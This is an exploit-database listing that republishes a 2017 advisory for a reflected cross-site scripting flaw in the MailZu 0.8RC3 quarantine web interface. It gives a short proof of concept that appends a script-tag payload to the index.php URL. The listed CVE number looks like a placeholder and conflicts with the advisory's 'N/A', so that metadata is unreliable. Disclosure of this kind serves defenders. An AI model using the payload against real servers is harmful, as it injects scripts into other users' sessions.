Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2022-12345 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Anonymous | High | Remote | 2017-01-19 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | 0.02192 | 0.50148 |
MailZu 0.8RC3 Cross Site Scripting [+]################################################################################################### [+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting [+] Credits / Discovery: Nassim Asrir [+] Author Email: [email protected] [+] Author Company: Henceforth [+]################################################################################################### Vendor: =============== https://sourceforge.net/ Product: =============== 0.8RC3 Download: =========== https://sourceforge.net/projects/mailzu/files/mailzu/ MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages. Vulnerability Type: ====================================== Reflected Cross Site Scripting. CVE Reference: =============== N/A Tested on: =============== Windows 7 Apache/2.4.23 (Win64) Exploit/POC: ============ 1) navigate the server http://server/index.php 2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script> 3) Done! Network Access: =============== Remote Impact: ================= Execute malicious scripts Severity: =========== High Disclosure Timeline: ===================== January 18, 2017 : Public Disclosure
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.